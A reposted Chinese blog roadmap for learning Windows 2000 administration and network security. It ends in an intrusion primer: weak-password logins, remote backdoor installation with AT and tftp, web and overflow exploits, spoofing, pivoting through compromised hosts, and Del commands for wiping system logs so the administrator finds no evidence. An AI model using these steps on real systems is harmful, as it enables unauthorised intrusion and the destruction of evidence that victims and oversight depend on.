***必須要掌握的計(jì)算機(jī)知識***必須要掌握哪些計(jì)算機(jī)知識？ 基礎(chǔ)： 如何去學(xué)習(xí) ·要有學(xué)習(xí)目標(biāo) ·要有學(xué)習(xí)計(jì)劃 ·要有正確的心態(tài) ·有很強(qiáng)的自學(xué)能力 學(xué)習(xí)目標(biāo) ·1.明確自己的發(fā)展方向(你現(xiàn)在或者將來要做什么,程序員?安全專家?網(wǎng)絡(luò)***等) ·2.自己目前的水平和能力有多高 ·能簡單操作windows2000 ·能簡單配置windows2000的一些服務(wù) ·能熟練的配置Windows2000的各種服務(wù) ·能熟練配置win2000和各種網(wǎng)絡(luò)設(shè)備聯(lián)網(wǎng) ·能簡單操作Linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統(tǒng) ·能配置cicso,huawei,3com,朗迅等網(wǎng)絡(luò)設(shè)備 ·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl ·能簡單編寫Asp,Php,Cgi和script,shell腳本 ·3.必須學(xué)會不相信態(tài)度,尊重各種各樣的能力 ·不要為那些裝模做樣的人浪費(fèi)時(shí)間 ·尊重別人的能力, ·會享受提高自己能力的樂趣. ·在知道了自己的水平和能力之后就要開始自己的目標(biāo)了 ·--------安全專家 ·--------*** ·--------高級程序員 ·***是建設(shè)網(wǎng)絡(luò),不是破壞網(wǎng)絡(luò), 破壞者是駭客; ·***有***的技術(shù),但是他們是維護(hù)網(wǎng)絡(luò)的,所以和安全專家是差不多的; ·因?yàn)槎萌绾?**才知道如何維護(hù) ·因?yàn)槎萌绾尉S護(hù)才更要了解如何*** ·這是 ***與安全專家的聯(lián)系 ·但,他們都是在會編程的基礎(chǔ)上成長的! ·下面我們開始我們的學(xué)習(xí)計(jì)劃! 學(xué)習(xí)計(jì)劃 有了學(xué)習(xí)計(jì)劃才能更有效的學(xué)習(xí) 安全學(xué)習(xí)計(jì)劃 不奢求對win98有多么精通,我們也不講解win98如何應(yīng)用,如何精通,我們的起步是win2000 s erver,這是我們培訓(xùn)的最低標(biāo)準(zhǔn),你對英語有一定的了解也是必不可少 最基礎(chǔ) ·a.會裝win2000,知道在安裝的時(shí)候有兩種分區(qū)格式,NTFS與FAT32 及他們的區(qū)別,知道win2 000可以在安裝的時(shí)候分區(qū),格式化硬盤, 可以定制安裝,可以定制自己需要安裝的一些組件 ,如果有網(wǎng)絡(luò)適配器,可以直接加入域中 學(xué)習(xí)點(diǎn):NTFS和FAT32分區(qū)的不同 各個(gè)組件的作用 域的定義 ·b.知道如何開,關(guān)機(jī) 知道注銷的用處 ·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra m Files ·d.知道管理工具里面各個(gè)組件的定義 ·e.學(xué)會應(yīng)用命令提示符cmd(dos) ·f.知道計(jì)算機(jī)管理里面的各個(gè)選項(xiàng)的不通 ·g.知道win2000強(qiáng)大的網(wǎng)絡(luò)管理功能 ·h.能非常熟練的操作win2000 ·i.知道IP地址,子網(wǎng)掩碼,網(wǎng)關(guān)和MAC的區(qū)別 進(jìn)階 ·A.配置IIS,知道各個(gè)選項(xiàng)的作用 ·B.配置DNS,DHCP ·C.配置主控制域,輔助域 ·D.配置DFS ·E.配置路由和遠(yuǎn)程訪問 ·F.配置安全策略IPSEC ·G.配置service(服務(wù)) ·H.配置磁盤管理,磁盤分額 ·i. 配置RAID(0,1,0+1,5) ·J.路由器的安裝與簡單配置 ·K.交換機(jī)的安裝與簡單配置 ·L.常見的×××,VLAN,NAT配置 ·M.配置常見的企業(yè)級防火墻 ·N.配置常見的企業(yè)級防病毒軟件 高級 ·之前我們學(xué)到的是任何一個(gè)想成為網(wǎng)絡(luò)安全專家和***基本知識中的一部分 ·你作到了嗎?? ·如果你做到了,足以找到一份很不錯(cuò)的工作! 配置負(fù)載均衡 ·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負(fù)載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA SERVER) · ·配置三層交換網(wǎng)絡(luò) · ·配置各種復(fù)雜的網(wǎng)絡(luò)環(huán)境 ·能策劃一個(gè)非常完整的網(wǎng)絡(luò)方案 · ·能獨(dú)自組建一個(gè)大型的企業(yè)級網(wǎng)絡(luò) · ·能迅速解決網(wǎng)絡(luò)中出現(xiàn)的各種疑難問題 結(jié)束 ·在你上面的都學(xué)好了,你已經(jīng)是一個(gè)高級人才了,也是我們VIP培訓(xùn)的目標(biāo)! ·可以找到一份非常好的工作 ·不會再因?yàn)榻o女朋友買不起玫瑰而發(fā)愁了! 安全： 導(dǎo)讀 ·系統(tǒng)安全服務(wù)(SYSTEM) ·防火墻系統(tǒng)(FIREWALL) ·***檢測(IDS) ·身份驗(yàn)證(CA) ·網(wǎng)站監(jiān)控和恢復(fù)(WEBSITE) ·安全電子商務(wù)(E-BUSINESS) ·安全電子郵件(E-MAIL) ·安全辦公自動化(OA) ·Internet訪問和監(jiān)控(A&C) ·病毒防范(VIRUS) ·虛擬局域網(wǎng)(×××) 系統(tǒng)安全服務(wù) ·系統(tǒng)安全管理 ·系統(tǒng)安全評估 ·系統(tǒng)安全加固 ·系統(tǒng)安全維護(hù) ·安全技能學(xué)習(xí) 系統(tǒng)安全管理 ·信息系統(tǒng)安全策略 ·信息系統(tǒng)管理員安全手冊 ·信息系統(tǒng)用戶安全手冊 ·緊急事件處理流程 系統(tǒng)安全評估 1、系統(tǒng)整體安全分析 · 分析用戶的網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，以找出其結(jié)構(gòu)性及網(wǎng)絡(luò) 配置上存在的安全隱患。 · 通過考察用戶信息設(shè)備的放置場地，以使得設(shè)備物理上是安全的。 · 分析用戶信息系統(tǒng)的管理、使用流程，以使得系統(tǒng) 能夠安全地管理、安全地使用 2、主機(jī)系統(tǒng)安全檢測 · 通過對主機(jī)進(jìn)行安全掃描，以發(fā)現(xiàn)系統(tǒng)的常見的安全漏洞。 · 對于特定的系統(tǒng)，采用特別的工具進(jìn)行安全掃描。 · 根據(jù)經(jīng)驗(yàn)，對系統(tǒng)存在的漏洞進(jìn)行綜合分析。 · 給出系統(tǒng)安全漏洞報(bào)告。 · 指出各個(gè)安全漏洞產(chǎn)生的原因以及會造成的危險(xiǎn)。 · 給出修復(fù)安全漏洞的建議 3、網(wǎng)絡(luò)設(shè)備安全檢測 · 通過對網(wǎng)絡(luò)進(jìn)行安全掃描，以發(fā)現(xiàn)網(wǎng)絡(luò)設(shè)備的安全漏洞。 · 根據(jù)經(jīng)驗(yàn)，對網(wǎng)絡(luò)設(shè)備存在的漏洞進(jìn)行綜合析。 · 給出網(wǎng)絡(luò)設(shè)備安全漏洞報(bào)告。 · 指出各個(gè)安全漏洞產(chǎn)生的原因以及會造成的險(xiǎn)。 · 給出修復(fù)安全漏洞的建議。 安全系統(tǒng)加固 ·為用戶系統(tǒng)打最新安全補(bǔ)丁程序。 ·為用戶修復(fù)系統(tǒng)、網(wǎng)絡(luò)中的安全漏洞。 ·為用戶去掉不必要的服務(wù)和應(yīng)用系統(tǒng)。 ·為用戶系統(tǒng)設(shè)置用戶權(quán)限訪問策略。 ·為用戶系統(tǒng)設(shè)置文件和目錄訪問策略。 ·針對用戶系統(tǒng)應(yīng)用進(jìn)行相應(yīng)的安全處理。 安全系統(tǒng)維護(hù) ·防火墻系統(tǒng)維護(hù)，安全日志分析 ·IDS系統(tǒng)維護(hù)，安全日志分析 ·×××系統(tǒng)維護(hù)，安全日志分析 ·認(rèn)證系統(tǒng)維護(hù)，安全日志分析 ·服務(wù)器、主機(jī)系統(tǒng)，安全日志分析 ·其它各類安全設(shè)施維護(hù)及日志分析 安全技能培訓(xùn) ·網(wǎng)絡(luò)安全基礎(chǔ)知識 ·網(wǎng)絡(luò)***手段演示和防范措施 ·防火墻的原理和使用 ·×××的原理和使用 ·漏洞掃描工具的原理和使用 ·IDS（***檢測系統(tǒng)）的原理和使用 ·身份認(rèn)證系統(tǒng)的原理和使用 ·防病毒產(chǎn)品的原理和使用 ·系統(tǒng)管理員安全培訓(xùn) ·一般用戶安全培訓(xùn) 防火墻系統(tǒng) ·防火墻的定義 ·防火墻的分類 ·包過濾防火墻 ·應(yīng)用網(wǎng)關(guān)防火墻 ·狀態(tài)檢測防火墻 ·一般企業(yè)防火墻配置 ·政府機(jī)構(gòu)防火墻配置 ·涉密網(wǎng)絡(luò)保密網(wǎng)關(guān)配置 ·高可用性和負(fù)載均衡防火墻系統(tǒng) ·高速防火墻系統(tǒng) 防火墻的定義 ·用以連接不同信任級別網(wǎng)絡(luò)的設(shè)備。 ·用來根據(jù)制定的安全規(guī)則對網(wǎng)絡(luò)間的通信進(jìn)行控制 防火墻的分類 ·包過濾 (Packet Filters) ·應(yīng)用網(wǎng)關(guān) (Application Gateways) ·狀態(tài)檢測(Stateful Inspection) 包過濾防火墻 ·包 過 濾 技 術(shù) ·主要在路由器上實(shí)現(xiàn)，根據(jù)用戶定義的內(nèi)容（如IP地址、端口號）進(jìn)行過濾。包過濾在網(wǎng) 絡(luò)層進(jìn)行包檢查與應(yīng)用無關(guān)。 · 優(yōu) 點(diǎn) · 具有良好的性能和可伸縮性。 · 缺點(diǎn) · 由于包過濾技術(shù)是對應(yīng)用不敏感的，無法理解特定通訊的含義，因而安全性很差。 應(yīng)用網(wǎng)關(guān)防火墻 ·應(yīng)用網(wǎng)關(guān)技術(shù) ·第二代防火墻技術(shù)，其在應(yīng)用的檢查方面有了較大的改進(jìn),能監(jiān)測所有應(yīng)用層，同時(shí)對應(yīng) 用“內(nèi)容”（Content Information）的含義引入到了防火墻策略的決策處理。 · 優(yōu)點(diǎn) · 安全性比較高。 · 缺點(diǎn) · 1、該方法對每一個(gè)請求都必須建立兩個(gè)連接，一個(gè)從客戶端到防火墻系統(tǒng)，另一個(gè)從 防火墻系統(tǒng)到服務(wù)器，這會嚴(yán)重影響性能。 · 2、防火墻網(wǎng)關(guān)暴露在***者之中。 · 3、對每一個(gè)代理需要有一個(gè)獨(dú)立的應(yīng)用進(jìn)程或 daemon 來處理， 這樣擴(kuò)展性和支持 新應(yīng)用方面存在問題。 檢測狀態(tài)防火墻 · 屬第三代防火墻技術(shù)，克服了以上兩種方法的缺點(diǎn)，引入了OSI全七層監(jiān)測能力，同時(shí) 又能保持 Client/Server的體系結(jié)構(gòu)，也即對用戶訪問是透明的。 · 防火墻能保護(hù)、限制其他用戶對防火墻網(wǎng)關(guān)本身的訪問。 · 狀態(tài)檢測技術(shù)在網(wǎng)絡(luò)層截獲數(shù)據(jù)包后交給INSPECT Engine,通過 INSPECT Engine 可以 從數(shù)據(jù)包中抽取安全決策所需的所有源于應(yīng)用層中的狀態(tài)相關(guān)信息，并在動態(tài)狀態(tài)表中 維 持這些信息以提供后繼連接的可能性預(yù)測。該方法能提供高安全性、高性能和擴(kuò)展性、高伸 縮性的解決方案。 ***檢測系統(tǒng) ·處理***時(shí)遇到的典型問題 ·解決***的方法和手段 ·基于網(wǎng)絡(luò)的***檢測 ·基于主機(jī)的***檢測 ·***檢測系統(tǒng)典型配置 處理***時(shí)遇到的問題 ·獲得的信息不足 ·不知到網(wǎng)絡(luò)上發(fā)生了什么事。 ·無法判定系統(tǒng)是否已經(jīng)被***。 ·信息不準(zhǔn)確 ·人員少 ·沒有足夠的人員維護(hù)管理。 ·缺乏規(guī)范的處理程序 ·發(fā)現(xiàn)***時(shí)如何反應(yīng)? ·下一步該如何處理? 解決***的方法和手段 ·采用***實(shí)時(shí)***監(jiān)控系統(tǒng)（IDS） ·對系統(tǒng)、網(wǎng)絡(luò)中發(fā)生的事件進(jìn)行實(shí)時(shí)監(jiān)控。 ·當(dāng)發(fā)生***事件時(shí)能即時(shí)反應(yīng)。 ·對***事件進(jìn)行詳細(xì)記錄并跟蹤。 基于主機(jī)的***檢測 ·軟件模塊安裝在包含有重要數(shù)據(jù)的主機(jī)上 ·監(jiān)視操作系統(tǒng)的日志以發(fā)現(xiàn)***的特征。 ·監(jiān)視代理所處主機(jī)上的所有進(jìn)程和用戶. ·監(jiān)視暴力登錄***（brute-force login）, 試圖改變或繞過安全設(shè)定，及特權(quán)的濫用等 。 ·當(dāng)新的日志產(chǎn)生時(shí)，為了減小對CPU的影響，代理程序暫時(shí)中斷。 基于網(wǎng)絡(luò)的***檢測 ·軟件安裝在專門的主機(jī)上，放置于關(guān)鍵的網(wǎng)段 ·將配置該軟件主機(jī)的網(wǎng)卡設(shè)置為混雜模式，使得該主機(jī)能接受網(wǎng)段上所有的包。 ·分析數(shù)據(jù)包以判斷是否有******。 ·監(jiān)視網(wǎng)段上的所有數(shù)據(jù)。 ·對網(wǎng)絡(luò)的流量無任何影響。 ·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s cans等***。 身份認(rèn)證系統(tǒng) ·用戶身份認(rèn)證的方法 ·不同認(rèn)證方法的安全級別 ·用戶身份認(rèn)證的常用方式 ·解決問題的方法 ·目前比較成熟的雙因素認(rèn)證方法 用戶身份驗(yàn)證 ·你知道的一些東西 · 密碼, ×××號，生日 ·你有的一些東西 · 磁卡, 智能卡,令牌, 鑰匙 ·你獨(dú)有的一些東西 · 指紋,聲音，視網(wǎng)膜 密碼是不安全的 ·可以破解密碼的工具太多 ·大多密碼在網(wǎng)絡(luò)中是明文傳輸?shù)? ·密碼可以網(wǎng)絡(luò)離線時(shí)被窺測 ·密碼和文件從PC和服務(wù)器上被轉(zhuǎn)移了 ·好記的密碼容易被猜到,不易猜測的密碼又太難記 解決方法 ·使用混合的工具:如IC卡+PIN 網(wǎng)站監(jiān)控與恢復(fù)系統(tǒng) ·典型的Web服務(wù)器應(yīng)用 ·Web服務(wù)器存在的安全問題 ·網(wǎng)站安全解決方法 典型web服務(wù)器應(yīng)用 ·Internet-->路由器-->防火墻-->web站點(diǎn) · | · | · 內(nèi)部網(wǎng) ·所有的放在防火墻后面 Web服務(wù)器存在的安全問題 · 網(wǎng)頁被非法篡改是網(wǎng)站內(nèi)容提供者最頭痛的問題。在采用防火墻后，Web服務(wù)器本身的漏 洞成為了網(wǎng)站被黑的主要問題。 · Web應(yīng)用服務(wù)器(如IIS,Apache中存在著大量的安 全漏洞.) · 用戶自己開發(fā)的CGI、ASP、PHP應(yīng)用中存在著大量潛在的漏洞。 網(wǎng)站安全 ·采用Web服務(wù)器監(jiān)控與恢復(fù)系統(tǒng) ·該系統(tǒng)提供對網(wǎng)站文件內(nèi)容的實(shí)時(shí)監(jiān)控，發(fā)現(xiàn)被改動后立即報(bào)警并自動恢復(fù)。 電子商務(wù)安全系統(tǒng) ·典型的電子商務(wù)應(yīng)用 ·電子商務(wù)中存在的安全問題 ·電子商務(wù)的安全解決方法 ·實(shí)時(shí)數(shù)據(jù)交換系統(tǒng) 典型電子商務(wù)應(yīng)用 ·Internet--->防火墻--->Web服務(wù)器 · || | · || | · 內(nèi)部網(wǎng)(數(shù)據(jù)庫) 電子商務(wù)中存在的安全問題 ·1、Web服務(wù)器端 ·Web應(yīng)用服務(wù)器（如IIS、Apache中存在著大量的安全漏洞。用戶自己開發(fā)的CGI、ASP、PH P應(yīng)用中存在著潛在的漏洞。 · ***通過這些漏洞***Web服務(wù)器，可非法篡改網(wǎng)頁，造成惡劣影響，動搖了電子商務(wù)使 用者的信心。 · 甚至可獲得Web服務(wù)器上大量的敏感資料，如用戶的信用卡號，用以連接內(nèi)部數(shù)據(jù)庫的帳 號和口令。 · 可能通過控制Web服務(wù)器，來***內(nèi)部數(shù)據(jù)庫。 電子商務(wù)中存在的安全問題 ·2、SSL協(xié)議 ·SSL加密強(qiáng)度低。由于瀏覽器默認(rèn)的加密模塊只支持40位的低強(qiáng)度加密，而且即使在瀏覽 器中安裝更高位的加密模塊，由于WEB服務(wù)器不提供對高位SSL鏈接的支持同樣無法實(shí)現(xiàn)高強(qiáng) 度SSL加密鏈接。 · 無法解決電子商務(wù)中的用戶簽名。SSL鏈接建立WEB服務(wù)器和用戶瀏覽器之間的安全通道 只能保證在安全通道內(nèi)的信息不被竊聽或篡改，并不能對用戶發(fā)送的信息進(jìn)行簽名以保證信 息的有效性和不可抵賴性，而這正是電子商務(wù)中必須解決的問題。 電子商務(wù)的安全解決方法 ·將WEB服務(wù)器分為兩部分：一般內(nèi)容的WEB服務(wù)器和交易WEB服務(wù)器。 · 一般內(nèi)容的WEB服務(wù)器放置在DMZ區(qū)內(nèi)，采用WEB站點(diǎn)監(jiān)控和恢復(fù)系統(tǒng)保護(hù)，防止主頁被非 法改動。 · 交易WEB服務(wù)器放置在內(nèi)部網(wǎng)內(nèi)，通過一臺物理分隔的實(shí)時(shí)數(shù)據(jù)交換系統(tǒng)將其與DMZ區(qū)相 連。 · 在客戶機(jī)和服務(wù)器端安裝SSL代理，從而獲得128位的高強(qiáng)度加密通道 實(shí)時(shí)數(shù)據(jù)交換系統(tǒng) ·將系統(tǒng)外部 Web服務(wù)器和內(nèi)部應(yīng)用Web服務(wù)器物理隔開. ·外部Web服務(wù)器用于存放一般的信息，內(nèi)部Web服 務(wù)器用于存放敏感信息，并和內(nèi)部數(shù)據(jù) 庫連接。 ·外部用戶通過http訪問位于DMZ區(qū)內(nèi)的一般Web服務(wù)器。 ·當(dāng)進(jìn)行交易時(shí)，用戶需訪問位于內(nèi)部網(wǎng)內(nèi)的應(yīng)用服務(wù)器。 ·https連接首先到達(dá)實(shí)時(shí)數(shù)據(jù)交換系統(tǒng)的虛擬外部Web服務(wù)器，實(shí)時(shí)數(shù)據(jù)交換系統(tǒng)將https 協(xié)議解開，只將https連接的數(shù)據(jù)內(nèi)容拷貝到虛擬內(nèi)部Web服務(wù)器，虛擬內(nèi)部Web服務(wù)器將使 用該數(shù)據(jù)重新發(fā)起https連接到實(shí)際的內(nèi)部應(yīng)用Web服務(wù)器. ·內(nèi)外通過實(shí)時(shí)數(shù)據(jù)交換系統(tǒng)進(jìn)行數(shù)據(jù)交換，無任何協(xié)議和連接穿過實(shí)時(shí)數(shù)據(jù)交換系統(tǒng)。 ·即使DMZ區(qū)的Web服務(wù)器受到***, ***者也的不到任何有用的信息 安全電子郵件系統(tǒng) ·電子郵件的安全問題 ·安全電子郵件的解決方法 ·一個(gè)安全郵件的使用過程 電子郵件的安全問題 ·如何保證發(fā)送的敏感信息不被泄漏 ·如何保證發(fā)送的信息不被篡改 ·如何確認(rèn)發(fā)件人的真實(shí)身份 ·如何防止發(fā)件人的抵賴行為 安全電子郵件的解決方法 ·將PKI體系應(yīng)用到郵件系統(tǒng)中 ·郵件的加密和解密以實(shí)現(xiàn)數(shù)據(jù)的保密。 ·郵件的數(shù)字簽名（鑒別）實(shí)現(xiàn)發(fā)件人認(rèn)證和不可抵賴。 ·完整性校驗(yàn)功能防止信息傳輸過程中被篡改可*的安全性。 ·采用公開密鑰和對稱密鑰相結(jié)合的密鑰體系。 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 辦公自動化系統(tǒng)的安全問題 · 如何保證發(fā)送的敏感信息不被泄漏 · 如何保證發(fā)送的信息不被篡改 · 如何確認(rèn)發(fā)件人的真實(shí)身份 · 如何防止發(fā)件人的抵賴行為 安全辦公自動化系統(tǒng)的解決方法 ·將PKI體系應(yīng)用到辦公自動化系統(tǒng)中 ·工作流信息的加密和解密以實(shí)現(xiàn)數(shù)據(jù)保密 ·工作流信息的數(shù)字簽名（鑒別）實(shí)現(xiàn)發(fā)件人認(rèn)證和不可抵賴。 ·完整性校驗(yàn)功能防止信息傳輸過程中被篡改可*的安全性。 ·采用公開密鑰和對稱密鑰相結(jié)合的密鑰體系 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 Internet訪問及控制系統(tǒng) ·Internet使用存在的問題 ·Internet使用的解決方法 ·內(nèi)容緩存系統(tǒng) ·Internet站點(diǎn)過濾系統(tǒng) Internet訪問存在的問題 ·Internet接入帶寬不足，訪問比較慢。 ·大量的用戶訪問相同的內(nèi)容，造成帶寬的進(jìn)一步擁擠。 ·在上班時(shí)間里大量的Internet訪問是與業(yè)務(wù)無關(guān)的。 ·有人使用公司的Internet系統(tǒng)訪問×××網(wǎng)站。 ·有人使用公司的Internet系統(tǒng)訪問反動站點(diǎn)。 ·管理人員無法知道Internet系統(tǒng)的使用情況。 Internet訪問的解決方法 · 對于問題一，采用內(nèi)容緩存系統(tǒng)。 · 對于問題二，采用Internet 站點(diǎn)過濾系統(tǒng)。 內(nèi)容緩存系統(tǒng) ·1、Client 發(fā)起http連接請求 ·2、Proxy 收到請求后將檢查內(nèi)部緩存內(nèi)是否有所需內(nèi)容，若有，則返還給Client。 ·3、若無，則Proxy根據(jù)請求向目的服務(wù)器發(fā)起請求。 ·4、Web服務(wù)器將內(nèi)容返回到Proxy服務(wù)器。 ·5、Proxy服務(wù)器將得到的內(nèi)容發(fā)回給Client，并在自己的緩存中保存一份。 Internet站點(diǎn)過濾系統(tǒng) (一) ·1、Client 發(fā)起http連接請求 ·2、連接到達(dá)防火墻時(shí)防火墻將URL送到WebSense Server 檢查。 ·3、WebSense 將審查結(jié)果返回到防火墻。 ·4、防火墻根據(jù)其策略決定是否讓該連接通過。 Internet站點(diǎn)過濾系統(tǒng) (二) ·1、Client 發(fā)起http連接請求 ·2、Proxy 受到請求后將URL送到WebSense Server檢查。 ·3、Proxy根據(jù)返回的結(jié)果決定是否接收該連接請求。 病毒防范系統(tǒng) · 互連網(wǎng)時(shí)代對防病毒系統(tǒng)的要求 · 計(jì)算機(jī)病毒解決方法 · 典型病毒防范系統(tǒng)部署 互聯(lián)網(wǎng)時(shí)代對防病毒系統(tǒng)的要求 · 由于計(jì)算機(jī)的聯(lián)網(wǎng)使用，使得病毒傳播的途徑大為增多：網(wǎng)絡(luò)文件共享、電子郵件、Int ernet文件下載，傳播速度也大為加快。 · 新病毒的出現(xiàn)速度加快，用戶的防病毒軟件的病毒特征碼沒能及時(shí)更新。 · 目前已出現(xiàn)了惡意的Java、ActiveX，當(dāng)使用者瀏覽到包含這些代碼的網(wǎng)頁時(shí)，會造成安 全問題。 · 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依***，可能會造成受害者的主 機(jī)被他人控制。 計(jì)算機(jī)病毒解決方法 · 從系統(tǒng)的觀點(diǎn)考慮病毒的防范，在所有病毒傳輸?shù)耐緩缴暇渲梅啦《拒浖?#xff0c;如客戶端 （Win98、 · Win2000)、文件服務(wù)器（NT、Netware）、郵件服務(wù)器（Exchange、Lotus Notes）、Internet接入系統(tǒng)（Proxy、Firewall)等。 · 整個(gè)病毒防范系統(tǒng)采用集中管理的方式，病毒特征碼統(tǒng)一更新，安全策略集中設(shè)定，從 而使得整個(gè)網(wǎng)絡(luò)系統(tǒng)的病毒特征碼得到快速更新。 · 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟件，來防范下在程序中帶有 的病毒和可能的惡意Java、ActiveX等可執(zhí)行代碼的***。 ×××（虛擬私有網(wǎng)） · 數(shù)據(jù)加密分類 · 物理線路加密 · 數(shù)據(jù)鏈路加密 · 網(wǎng)絡(luò)層加密—IPSec · 傳輸層加密—SSL 數(shù)據(jù)加密類型 ·物理層->物理層 物理線路加密 ·數(shù)據(jù)鏈路層->數(shù)據(jù)鏈路層 (路由器訪問) ·在數(shù)據(jù)鏈路層(如PPP）進(jìn)行加密 L2TP、PPTP、L2F ·網(wǎng)絡(luò)層->網(wǎng)絡(luò)層(路由器 防火墻 主機(jī)) ·在網(wǎng)絡(luò)層 （如IP）進(jìn)行加密 IPSec ·傳輸層->傳輸層 (對TCP進(jìn)行加密 SSL) ·應(yīng)用層->應(yīng)用層(在應(yīng)用層 (如TCP）進(jìn)行加密 S/MIME、SET、SSH) 物理線路加密 · DDN 加密機(jī) · 幀中繼加密機(jī) · 異步撥號Modem · ISDN線路密碼機(jī) · ATM加密機(jī) 注:傳輸層加密 ·Secure Sockets Layer (SSL) 是一個(gè)端到端的Internet 安全協(xié)議，通過采用數(shù)字證書， 它提供了數(shù)據(jù)加密、身份認(rèn)證的功能。SSL建立在傳輸層，它為客戶機(jī)和服務(wù)器在應(yīng)用級建 立起一個(gè)端到斷的安全會話。 ·SSL代理—128位的高強(qiáng)度加密模塊 結(jié)束語·恭喜你: ·學(xué)完這些并且可以熟練應(yīng)用,已經(jīng)是一個(gè)真正的網(wǎng)絡(luò)安全專家了! ·希望此時(shí)的你旁邊有個(gè)溫柔稍有點(diǎn)調(diào)皮的女朋友,為這孤獨(dú)而寂寞的網(wǎng)絡(luò)添加一點(diǎn)跳動的 色彩! ***編： 必須要掌握的幾個(gè)命令 ·Net ·netsh ·Ftp ·hostname ·Telenet(nc) ·tracert ·At ·Tftp ·Netstat ·Regedit ·Ping 必須要掌握的幾個(gè)協(xié)議 ·http ·dns ·ftp ·Pop ·Smtp ·Icmp ·Udp ·tcp 開始 ·掌握了******的方式和手段后,那么學(xué)習(xí)***就簡單多了! ·因?yàn)槟阏莆樟诉@些,剩余的就是使用工具*** ·熟悉掌握一套自己用的***工具 高級 ·自己編寫專用的***工具 ·自己發(fā)現(xiàn)系統(tǒng)漏洞 ******手段 ·收集信息: · 收集要***的目標(biāo)信息 · IP,域名,端口,漏洞,位置 弱口令 ·在nt\2000\xp\2003中弱口令可以用 ·Net use \ip “password” /user:user ·如果目標(biāo)機(jī)開3389服務(wù),可以直接連接 ·在sql的sa弱口令,可以用sql連接器直接 ·登陸 后門*** ·如果有ipc$共享,可以copy過去***后門 ·用at啟動 ·AT \ip time /INTERACTIVE ·如果可以得到shell,也可以用tftp ·Tftp.exe –i ip get *.* *.* ·然后直接安裝 ·如果有3389,可以自己建一個(gè)iis,下載 直接運(yùn)行 密碼破解 ·遠(yuǎn)程破解mysql,mssql,ftp,mail,共享密碼 ·本地破解管理員(administrator)密碼 緩沖溢出 ·可以用緩沖溢出***, ·比如流行的webdev,rdcom模塊漏洞 ·可以直接得到system管理權(quán)限 ·緩沖溢出后的一般現(xiàn)象是: ·Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> Web服務(wù)漏洞 ·例如: ·Unicode漏洞遍歷磁盤和執(zhí)行程序 ·二次編碼漏洞遍歷磁盤和執(zhí)行程序 ·.HTR漏洞查看源代碼 嗅探監(jiān)聽 ·例如: ·針對web監(jiān)聽 ·針對mail監(jiān)聽 ·工具如:sinffer , iris 欺騙*** ·例如: ·運(yùn)用arp欺騙*** 偽裝欺騙 ·常見的如:mail病毒 ·把一個(gè)文件改名字甚至圖標(biāo),欺騙對方執(zhí)行 社會工程學(xué) ·例如: ·QQ聊天誘惑 ·EMAIL信息 ·電話 ·誘惑 拒絕服務(wù) ·例如: ·Dos*** ·Ddos*** 利用跳板 ·利用自己的肉雞作為跳板***別的機(jī)器 ·My PC------>跳板(肉雞)--->目標(biāo) 路由器漏洞 ·如: ·原始密碼 ·程序漏洞 防火墻 ·利用欺騙***防火墻,導(dǎo)致防火墻功能失效 ·利用防火墻的模塊漏洞 unix/linux ·NetWare Linux unix solais Solaris hp-unix Aix 等 ·這些目前先不講解 精通***工具 ·必須有一套自己可以完全掌握的***工具 ·如端口掃描 Nscan,bluescanport ·監(jiān)聽工具:sinffer iris ·telnet工具:nc ·掃描工具:sss,nmap, LANguard ·后門工具:radmin,winshell ·密碼破解:lc4 ·遠(yuǎn)程管理:pcanywhere ·會使用各種經(jīng)典的***工具 清除日志 ·在你***機(jī)器以后,離開的時(shí)候,要完全清除 ·自己在那臺機(jī)器上留下的痕跡 ·例如清除 ·Del C:\WINNT\system32\LogFiles\*.* ·Del C:\WINNT\system32\*.log ·Del C:\WINNT\system32\*.txt ·Del C:\WINNT\*.log ·Del c:\winnt\*.txt 如果你不清除日志 ·當(dāng)目標(biāo)機(jī)器的管理員發(fā)現(xiàn)你的證據(jù) ·完全可以讓你在大墻內(nèi)渡過一段日子 *** ·當(dāng)你完全掌握這些后 ·你就成為了一名小*** 高級 ·編寫自己的***工具 ·發(fā)現(xiàn)系統(tǒng)漏洞 高級*** ·目前你足以成為一個(gè)高級***了 真正的*** ·精通各種網(wǎng)絡(luò)協(xié)議 ·精通操作系統(tǒng) ·精通編程技術(shù) ·精通安全防護(hù) ·不搞破壞 ·挑戰(zhàn)技術(shù)難題 結(jié)束 ·想學(xué)好這些,并不是*別人給你的,而是*自己的努力,自己的自學(xué)得到的! ·別人只能指導(dǎo)你,怎么去做,只能告訴方法, ·真正的實(shí)施是你自己,經(jīng)過N*N個(gè)日夜努力換來的

轉(zhuǎn)載于:https://blog.51cto.com/306336942/97652

總結(jié)

以上是生活随笔為你收集整理的***必须要掌握的计算机知识的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。